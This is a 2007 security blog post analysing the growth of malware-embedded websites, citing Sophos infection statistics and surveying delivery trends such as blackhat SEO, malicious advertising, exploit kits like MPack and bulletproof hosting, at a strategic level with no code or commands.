Malware embedded web sites are steadily gaining a priority in an attacker's arsenal of infection and propagation vectors, and we've been witnessing the trend for over an year and a half now. Malware authors seem to have found an efficient way to hijack, inject and exploit legitimate sites or Web 2.0 services in order to serve the obfuscated payload which is no longer purely relying on social engineering tactics, but is basically exploiting unpatched client side vulnerabilities to infect the visitors. Also, malware authors seem to have started thinking as true marketers, taking into consideration that a visitor will go through a potentially malware embedded site only once and wouldn't visit it given the lack of content -- blackhat SEO garbage -- so that they've stopped relying on having a malicious site exploit a single vulnerability only, and started hosting multi-browser, multi-third-party malware embedded sites, thus achieving malicious economies of scale.Here's a great summary courtesy of Sophos showcasing the increasing number of sites with malware embedded payload :
Wednesday, July 25, 2007
"The figures compiled by Sophos's global network of monitoring stations show that infected web pages continue to pose a threat, affecting official government websites as well as other legitimate pages. On average this month, Sophos uncovered 9,500 new infected web pages daily - an increase of more than 1000 every day when compared to April. In total, 304,000 web pages hosting malicious code were identified in May."
The stats are a great wake up call for those still believing that malware comes in the form of executables and is mostly using email as propagation and infection vector. Moreover, these stats show great similaties with the ones released by ScanSafe an year ago whose conclusion was that based on 5 billion web requests there was once piece of malware hosted on 1 of every 600 social networking pages. Furthermore, Finjan's latest Web Security Trends Report indicates the rise of evasive web malware that is aiming at making cyber forensics of malware embedded sites like the ones I provided you with in previous posts, harder to conduct.
Malware embedding techniques
- vulnerabilities within popular traffic aggregators and web 2.0 darlings have a huge potential, but a major downsize from an attacker's perspective - they're like sending several hundred pieces of zero day malware to couple of million emails, thus having anti virus vendors and the security community detect the malware outbreak and react accordingly
- a pull approach consisting of blackhat SEO on popular searches, or any strategy related to seducing the end user's desire for "free lunch" online while abusing it. We've already seen automated spamming attacks at the .EDU domain in order to harness the power of a university site's pagerank so that the malicious sites get higher priority in search engines
- a push approach - via spam and phishing emails, a digital greed so that in case the attackers cannot trick you into giving them your accounting and financial data, they'll infect you with malware in between, a trend which I'm seeing recently. Basically, you have a fake PayPal phishing page hosting malware in between the scam
- passive - using advertising networks are infection vectors, basically a fake but reputable looking service or product centered site is set up, an advertising budget on a CPC basis is considered, and even though you may visit Yahoo.com an ad appearing at the top though a third-party advertising network may indeed turn out to be one loading a malicious payload. We've already seen this malicious cycle with zero day vulnerabilities trying to take the maximum advantage out of the window of opportunity of a certain vulnerability, and despite that zero day vulnerabilities are greatly desired by malware authors, the plain simple truth whose effectiveness we've seen with MPack is that the attack was a very successful one given it was abusing old vulnerabilities. So, if the end user doesn't patch, an old and already patched vulnerability has the same value as a zero day one, isn't it?
- Web application vulnerabilities exploited in an automated fashion make it possible for malicious attackers to inject malicious pages within domains with high page rank and ones attracting lots of traffic. In a previous post I provided various screenshots of an IRC controlled bot google hacking for vulnerabilities and injecting web shells to take control over the vulnerable sites. Next time it could logically be web backdoors making it harder for the exploited party to react given the perimeter defense myopia they're still living in
- DIY malware kits make it possible for virtially anyone to embed malware on a web page. In my "Future Trends of Malware" publication I emphasized on how open source malware is undermining the entire singnatures based detection model, at least in respect of timing. Open source malware evolved into open source exploitation and statistics tools, thus lowering the entry barriers into the malware area for anyone who has obtained the source code of these kits. It's even more interesting to note that given the open source nature of the kits, modifications are already getting traded and used in the wild, so basically, the MPack kit we know of last month is someone elses's advanced malware distribution platform next month. Anyway, going through an interview with the authors of MPack, I'd rather say - a little less who, and a little bit more on what's to come in this space, would be a wise approach
- Malicious pages hosting service on usually compromised servers on purposely ignoring "take down notices" to further extend the window of opportunity for someone to visit and get infected. Various vendors such as RSA and NetCraft are already developing a market segment for timely shutting down such phishing and malware hosting web sites, and by the time the service scales enought I'd be very interested in seeing some averages based on the time it took them to shut down such a site
- A logical move exploiting the overall lack of awareness from the end user's part on how client side vulnerabilities result in malware infections compared to potentially malware infected downloads as it used to be in the past, a very tricky situation by itself taking into consideration the future growth of E-commerce. With end users becoming more privacy conscious, and the countless users who wouldn't purchase anything only for more than $50 let's say, trying to communicate to them that malware can be found on literally any web site and that it's not longer coming in the typical binary nature they're used to, could undermine their confidence in E-commerce even more
- Malicious economies of scale, a phrase I coined to bring the discussion at another level, namely, that malware authors are putting less efforts but achieving a higher level of productivity, greatly represents the concept of malware embedded sites
Posted by Dancho Danchev at Wednesday, July 25, 2007